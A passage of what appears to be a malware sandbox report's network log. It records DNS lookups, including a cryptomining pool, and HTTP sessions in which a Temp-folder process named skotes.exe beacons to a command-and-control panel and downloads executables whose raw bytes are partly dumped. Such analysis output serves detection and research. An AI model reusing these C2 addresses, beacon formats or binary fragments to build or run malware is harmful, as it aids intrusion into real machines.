                                                                                                                                                                                              Dec 16, 2024 01:04:39.062555075 CET192.168.2.41.1.1.10x9b59Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:39.063095093 CET192.168.2.41.1.1.10x2e64Standard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:44.328267097 CET192.168.2.41.1.1.10xf6a9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:44.328562021 CET192.168.2.41.1.1.10x3a95Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Dec 16, 2024 01:01:12.794671059 CET1.1.1.1192.168.2.40x7a86No error (0)woo097878781.win154.216.20.243A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:01:32.110543013 CET1.1.1.1192.168.2.40x32e4No error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:01:32.110543013 CET1.1.1.1192.168.2.40x32e4No error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:01:40.932977915 CET1.1.1.1192.168.2.40xe1f4No error (0)drive-connect.cyou104.21.79.7A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:01:40.932977915 CET1.1.1.1192.168.2.40xe1f4No error (0)drive-connect.cyou172.67.139.78A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:05.745569944 CET1.1.1.1192.168.2.40x5939No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:05.745569944 CET1.1.1.1192.168.2.40x5939No error (0)httpbin.org44.196.3.45A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:14.454417944 CET1.1.1.1192.168.2.40x584bNo error (0)home.fivegr5sb.top141.8.192.141A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:17.577414989 CET1.1.1.1192.168.2.40x5c08No error (0)home.fivegr5sb.top141.8.192.141A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:44.195910931 CET1.1.1.1192.168.2.40x5bd2No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:44.196408033 CET1.1.1.1192.168.2.40x30e8No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:27.431802034 CET1.1.1.1192.168.2.40x408eNo error (0)fivegr5sb.top141.8.192.141A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:30.864624023 CET1.1.1.1192.168.2.40x6b49No error (0)fivegr5sb.top141.8.192.141A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:39.201118946 CET1.1.1.1192.168.2.40x2e64No error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:39.201118946 CET1.1.1.1192.168.2.40x2e64No error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:39.201221943 CET1.1.1.1192.168.2.40x9b59No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:44.466293097 CET1.1.1.1192.168.2.40xf6a9No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:44.466495037 CET1.1.1.1192.168.2.40x3a95No error (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449758185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:05.175170898 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:01:06.506673098 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:06 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449764185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:08.142946005 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:01:09.508728027 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:09 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 61 31 0d 0a 20 3c 63 3e 31 30 31 35 37 38 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 65 32 65 63 31 31 30 31 61 65 36 30 32 62 32 31 61 31 64 30 33 34 36 61 64 65 66 63 32 33 32 62 38 39 34 39 61 35 35 33 36 65 36 23 31 30 31 35 38 31 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 65 32 62 63 36 31 35 31 39 65 64 30 33 62 36 31 65 31 64 30 33 36 64 38 38 66 64 65 33 34 38 61 34 38 33 39 61 35 35 33 36 65 36 23 31 30 31 35 38 32 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 35 38 32 32 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: 4a1 <c>1015781001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e2ec1101ae602b21a1d0346adefc232b8949a5536e6#1015819001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e2bc61519ed03b61e1d036d88fde348a4839a5536e6#1015821001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1015822001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1015823001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1015824001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1015825001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#1015826001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1015827001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1015828001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1015829001+ [TRUNCATED]
                                                                                                                                                                                              Dec 16, 2024 01:01:09.508785963 CET140INData Raw: 37 65 38 65 34 66 34 62 32 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 31 30 31 35 38 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30
                                                                                                                                                                                              Data Ascii: 7e8e4f4b2846d934f48b15eaa495c49#1015830001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7393574df141e542404358d6d9fc1d#<d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.44977031.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:09.633111954 CET66OUTGET /files/5131681669/sUSFJjY.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957385063 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:10 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 89640
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 22:28:18 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f5802-15e28"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 46 47 5f 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 2e 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 36 01 00 28 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdFG_g". @ ``6(( H.text, . `.rsrc`0@@Hh0(**(*F w>((&*.((*0 >(( Y?((soss+s l?((&,ioo,o,o,o*4H_E6{9N(p2(o*( >((((+o*Z >(s(I*.s(Y*
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957444906 CET1236INData Raw: 04 00 00 04 2a 56 20 21 3d 00 00 28 d0 01 00 06 7e 04 00 00 04 28 13 00 00 0a 2a 00 00 00 13 30 03 00 7e 00 00 00 00 00 00 00 02 73 14 00 00 0a 7d 05 00 00 04 02 73 15 00 00 0a 7d 06 00 00 04 02 73 16 00 00 0a 7d 07 00 00 04 02 7e 14 00 00 04 3a
                                                                                                                                                                                              Data Ascii: *V !=(~(*0~s}s}s}~:cs~s}s}~}}}}(*N(o}*>(o*v(9}o&&*{*"
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957463026 CET1236INData Raw: 33 00 00 0a 6f 31 00 00 0a 06 28 3a 00 00 06 2a 00 00 13 30 02 00 2c 00 00 00 04 00 00 11 02 7b 13 00 00 04 3a 06 00 00 00 02 38 07 00 00 00 02 02 28 3c 00 00 06 0a 06 03 6f 3e 00 00 06 03 6f 34 00 00 0a 6f 32 00 00 0a 2a 26 02 17 7d 13 00 00 04
                                                                                                                                                                                              Data Ascii: 3o1(:*0,{:8(<o>o4o2*&}*jo:*o(<*R{9{**0sz}}(=-*{ :((5,s}{o>*([9{-{
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957739115 CET1236INData Raw: 00 00 02 00 0e 00 53 61 00 0a 00 00 00 00 13 30 03 00 4e 00 00 00 0c 00 00 11 02 28 4f 01 00 06 2c 11 73 50 00 00 0a 0a 06 02 6f 51 00 00 0a 06 0b 2b 33 02 20 be 3a 00 00 28 d0 01 00 06 28 52 00 00 0a 7e 17 00 00 04 2d 11 14 fe 06 68 00 00 06 73
                                                                                                                                                                                              Data Ascii: Sa0N(O,sPoQ+3 :((R~-hsS~(+*"(O*"07oK8oL(K&oO-9o*!({*6{oV*>{oW&*6{
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957791090 CET896INData Raw: 00 00 04 03 14 16 6f 6d 00 00 0a 2a 36 03 02 7b 1f 00 00 04 6f 3e 00 00 06 2a 46 02 20 09 3e 00 00 28 d0 01 00 06 28 0f 00 00 06 2a 1a 7e 20 00 00 04 2a 1e 02 80 20 00 00 04 2a 00 00 00 13 30 02 00 53 00 00 00 11 00 00 11 28 7e 00 00 06 0a 06 45
                                                                                                                                                                                              Data Ascii: om*6{o>*F >((*~ * *0S(~E$+" =(oD* =(oD* =(o@oA*2sn(o*6sn(p*>(o}q*0es}r~s:t
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958034039 CET1236INData Raw: 00 00 02 00 0c 00 2d 39 00 0d 00 00 00 00 36 02 7b 7a 00 00 0a 03 6f 7f 00 00 0a 2a 00 00 13 30 03 00 2d 00 00 00 14 00 00 11 73 8f 00 00 0a 0a 06 03 7d 90 00 00 0a 06 16 7d 91 00 00 0a 02 06 fe 06 92 00 00 0a 73 93 00 00 0a 28 94 00 00 0a 06 7b
                                                                                                                                                                                              Data Ascii: -96{zo*0-s}}s({*0Os}{zs(+~:s~~(+(+*0 ({zoo*~{zo9
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958067894 CET1236INData Raw: 00 04 06 7b 3d 00 00 04 7b 35 00 00 04 6f c5 00 00 0a 02 7b 35 00 00 04 6f c5 00 00 0a 28 11 00 00 2b 28 12 00 00 2b 0b 07 7e 3a 00 00 04 3a 11 00 00 00 14 fe 06 c0 00 00 06 73 c8 00 00 0a 80 3a 00 00 04 7e 3a 00 00 04 28 13 00 00 2b 7e 3b 00 00
                                                                                                                                                                                              Data Ascii: {={5o{5o(+(+~::s:~:(+~;:s;~;(+s(+{={6so*s*0'4(o(*01>
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958120108 CET1236INData Raw: 6f b7 00 00 0a 2a 5e 02 7b e9 00 00 0a 7e 56 00 00 04 6f ee 00 00 0a 03 6f b5 00 00 0a 2a 32 02 7b e2 00 00 0a 6f 0b 01 00 0a 2a 36 02 7b e2 00 00 0a 03 6f 0c 01 00 0a 2a 36 13 30 03 00 88 00 00 00 21 00 00 11 73 0d 01 00 0a 0a 06 03 7d 0e 01 00
                                                                                                                                                                                              Data Ascii: o*^{~Voo*2{o*6{o*60!s}}{{{o{o{{o(+~:sS~(+(+s(+*f{%so*s*o
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958153009 CET1236INData Raw: 00 0a dc 06 2a 00 01 10 00 00 02 00 06 00 0c 12 00 07 00 00 00 00 1b 30 01 00 19 00 00 00 00 00 00 00 02 6f 3d 01 00 0a 03 6f 38 01 00 0a dd 07 00 00 00 02 6f 3e 01 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 11 11 00 07 00 00 00 00 1b 30 03 00
                                                                                                                                                                                              Data Ascii: *0o=o8o>*0[%s?}@}Ao={@oB9:Cs2(oo>*<Rr{DoB9{Eo8*%:&~V
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958195925 CET1236INData Raw: 00 00 1b 02 7b 72 01 00 0a 8c 29 00 00 1b 28 74 01 00 0a 2a 16 2a 13 30 02 00 45 00 00 00 00 00 00 00 14 03 28 73 01 00 0a 39 02 00 00 00 16 2a 02 03 28 73 01 00 0a 39 02 00 00 00 17 2a 03 6f 75 01 00 0a d0 4c 00 00 1b 28 0d 00 00 0a 28 76 01 00
                                                                                                                                                                                              Data Ascii: {r)(t**0E(s9*(s9*ouL((v9*tL(w*0N*{q:8{qox Z{r):8{r)oxa* >({q{r)(y*~t*t
                                                                                                                                                                                              Dec 16, 2024 01:01:11.077704906 CET1236INData Raw: 00 00 04 03 6f 32 00 00 06 26 2a 8e 02 7b 77 00 00 04 28 2a 00 00 2b 3a 07 00 00 00 02 7b 76 00 00 04 2a 02 7b 77 00 00 04 6f 82 01 00 0a 2a 1e 02 7b 7e 00 00 04 2a 22 02 03 7d 7e 00 00 04 2a 4e 02 7b 7a 00 00 04 03 02 6f 32 00 00 0a 6f 83 01 00
                                                                                                                                                                                              Data Ascii: o2&*{w(*+:{v*{wo*{~*"}~*N{zo2o*0om(k{{o*V( <((*0'-(oso9o*0&(("


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.449782185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:13.706434965 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 37 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015781001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:01:15.041311979 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:14 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.44978331.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:15.206461906 CET66OUTGET /files/5444530229/XpAg0vN.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544481993 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:16 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 55808
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:16:05 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6335-da00"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 6c 00 01 00 00 00 02 00 00 00 ff ff 00 00 00 00 00 00 11 00 00 00 40 00 00 00 00 00 00 00 57 69 6e 33 32 20 50 72 6f 67 72 61 6d 21 0d 0a 24 b4 09 ba 00 01 cd 21 b4 4c cd 21 60 00 00 00 47 6f 4c 69 6e 6b 2c 20 47 6f 41 73 6d 20 77 77 77 2e 47 6f 44 65 76 54 6f 6f 6c 2e 63 6f 6d 00 50 45 00 00 4c 01 05 00 39 8f c0 52 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 01 00 00 78 00 00 00 5e 00 00 00 00 00 00 30 2a 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 5d 30 01 00 03 00 00 00 00 00 10 00 00 00 01 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 30 01 00 28 00 00 00 00 10 01 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 30 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZl@Win32 Program!$!L!`GoLink, GoAsm www.GoDevTool.comPEL9Rx^0*@@]00( 10code@vx `data{L|@.rsrc@@.rdata1 @@.idata0 `
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544523954 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 08 00 00 00 c1 c0 04 88 c2 83 e2 0f 38 ea 75 0f e2 f2 c6 07 30 47 c3 c1 c0 04 88 c2
                                                                                                                                                                                              Data Ascii: 8u0GX@GPRQS11RA19uX0[YZX<t1h@@uj@A@tjh@QR5\@t@W@vfu_)@@@u
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544540882 CET448INData Raw: 40 00 3b 1d b8 aa 40 00 73 3b 8b 03 83 f8 04 76 26 3d 00 00 00 01 77 22 85 c8 74 1e 25 ff 03 00 00 83 e8 20 72 14 39 d7 73 15 e8 f7 fe ff ff ff 05 70 90 40 00 eb 03 83 c3 20 83 c3 20 eb c3 66 b8 0d 0a 66 ab 83 3d 70 90 40 00 01 72 4e f7 c1 00 08
                                                                                                                                                                                              Data Ascii: @;@s;v&=w"t% r9sp@ ff=p@rNuu@u==p@wAf@ .u@uAjh@WhA5\@uv@u1@,@)v@G.res<Zw<Ar.RESG@@u@tI
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544557095 CET1236INData Raw: 00 80 75 09 f6 05 14 ac 40 00 10 74 05 e8 6a 05 00 00 6a 00 68 80 00 00 00 6a 02 6a 00 6a 01 68 00 00 00 c0 52 f6 05 14 ac 40 00 80 74 08 ff 15 48 90 40 00 eb 05 e8 78 19 01 00 83 f8 ff 75 02 f9 c3 89 c6 6a 00 6a 00 6a 00 56 e8 69 19 01 00 a1 0c
                                                                                                                                                                                              Data Ascii: u@tjjhjjjhR@tH@xujjjVi@+@jh@P5@V2@+@jh@P5@VV+V+@%v@? uGIuv}]nrU@BBt[?=uFGItR?=t+
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544574022 CET1236INData Raw: 40 00 eb 71 89 ca 81 c2 10 da 40 00 8b 02 4a b3 40 66 3d 52 43 74 0c 66 3d 52 63 74 06 66 3d 72 63 75 08 80 7a 03 00 74 4c eb 43 b3 80 c1 e0 08 c1 e8 08 3d 52 45 53 00 74 0e 3d 52 65 73 00 74 07 3d 72 65 73 00 75 26 80 7a 04 00 75 20 80 0d 76 90
                                                                                                                                                                                              Data Ascii: @q@J@f=RCtf=Rctf=rcuztLC=RESt=Rest=resu&zu v@v@tv@u@,@%v@v@uv@,@%@m%@SWVV@4vfftu@@u")WjjhWSVj
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544591904 CET1236INData Raw: 40 00 81 fa ff 00 00 00 77 05 be 9d 96 40 00 e8 33 f0 ff ff 89 d0 eb 2b be be 96 40 00 83 fa 04 74 0a be cd 96 40 00 83 fa 05 75 07 e8 16 f0 ff ff eb 18 b8 b4 cb 40 00 53 e8 5c ff ff ff 5b 72 c9 eb 08 e8 b1 ef ff ff b0 68 aa 83 c3 04 eb 1d 6a 00
                                                                                                                                                                                              Data Ascii: @w@3+@t@u@S\[rhjjhWjSjjOURWuD@=@r-f, f@@@r%@X%@_Z]Cf@%PA
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544608116 CET1236INData Raw: e3 55 89 c8 a3 2c 90 40 00 c1 e0 02 01 c2 c1 e0 02 a3 18 90 40 00 01 c2 01 c2 81 c2 00 02 00 00 01 f2 31 c0 f6 05 77 90 40 00 01 74 07 89 c8 d1 e0 8d 04 c0 c1 e1 06 81 c1 00 02 00 00 01 c1 6a 04 68 00 10 00 00 52 6a 00 6a 04 68 00 10 00 00 51 6a
                                                                                                                                                                                              Data Ascii: U,@@1w@tjhRjjhQj@@@@0@VF61-8@=@fLw@tfdff8@w@t,@@1fff`@1
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544625044 CET1236INData Raw: 09 c0 74 7c a3 44 90 40 00 68 4b aa 40 00 57 e8 bb 06 01 00 09 c0 74 68 a3 48 90 40 00 68 57 aa 40 00 57 e8 a7 06 01 00 09 c0 74 54 a3 4c 90 40 00 68 6a aa 40 00 57 e8 93 06 01 00 09 c0 74 40 a3 50 90 40 00 68 76 aa 40 00 57 e8 7f 06 01 00 09 c0
                                                                                                                                                                                              Data Ascii: t|D@hK@WthH@hW@WtTL@hj@Wt@P@hv@Wt,T@h@rh@W_tX@@h(@PjO\@6r<|r5v@@*uv@tv@up@3br[rT
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544641972 CET1236INData Raw: 40 00 00 10 00 00 8b 15 9c ab 40 00 c3 81 fb 01 10 00 00 76 0e ba 74 08 00 00 eb 05 ba 8a 18 01 00 f9 c3 e8 a5 ff ff ff 74 f2 51 89 72 08 66 89 5a 06 a1 a0 ab 40 00 66 89 42 04 66 8b 0d ca ab 40 00 f6 05 16 ac 40 00 80 74 07 66 8b 0d cc ab 40 00
                                                                                                                                                                                              Data Ascii: @@vttQrfZ@fBf@@tf@fJ@tJBf$5@;5@t,~tf;Vuf;NuLf9uf;Nu@ua`@@$fBf@@tf@fB@
                                                                                                                                                                                              Dec 16, 2024 01:01:16.544661045 CET1236INData Raw: 00 00 72 45 f6 05 19 ac 40 00 04 75 4d e3 41 b0 0d f2 ae 75 3b f6 05 19 ac 40 00 20 75 0a 8b 35 d8 aa 40 00 66 ff 46 36 89 3d 6c ab 40 00 89 0d 70 ab 40 00 e3 c7 80 3f 0a 75 c2 ff 05 6c ab 40 00 ff 0d 70 ab 40 00 eb b4 e3 05 e8 8c 0b 00 00 80 25
                                                                                                                                                                                              Data Ascii: rE@uMAu;@ u5@fF6=l@p@?ul@p@%@%@^5@5@;5@sN>w6t1>u,~ur~0t5@As XN0~Z;@tEnUSQWV5@5\@5@5
                                                                                                                                                                                              Dec 16, 2024 01:01:16.664592981 CET1236INData Raw: 40 00 29 e8 29 c6 e9 6e ff ff ff 58 5d c3 8b 42 04 a3 70 ab 40 00 8b 42 08 a3 6c ab 40 00 89 15 00 ab 40 00 83 3d d0 ab 40 00 00 74 2c e8 c4 fe ff ff 72 4a e8 dc fd ff ff 72 41 83 3d d4 ab 40 00 00 74 33 a1 e0 ab 40 00 e8 2d fe ff ff 72 2e e8 06
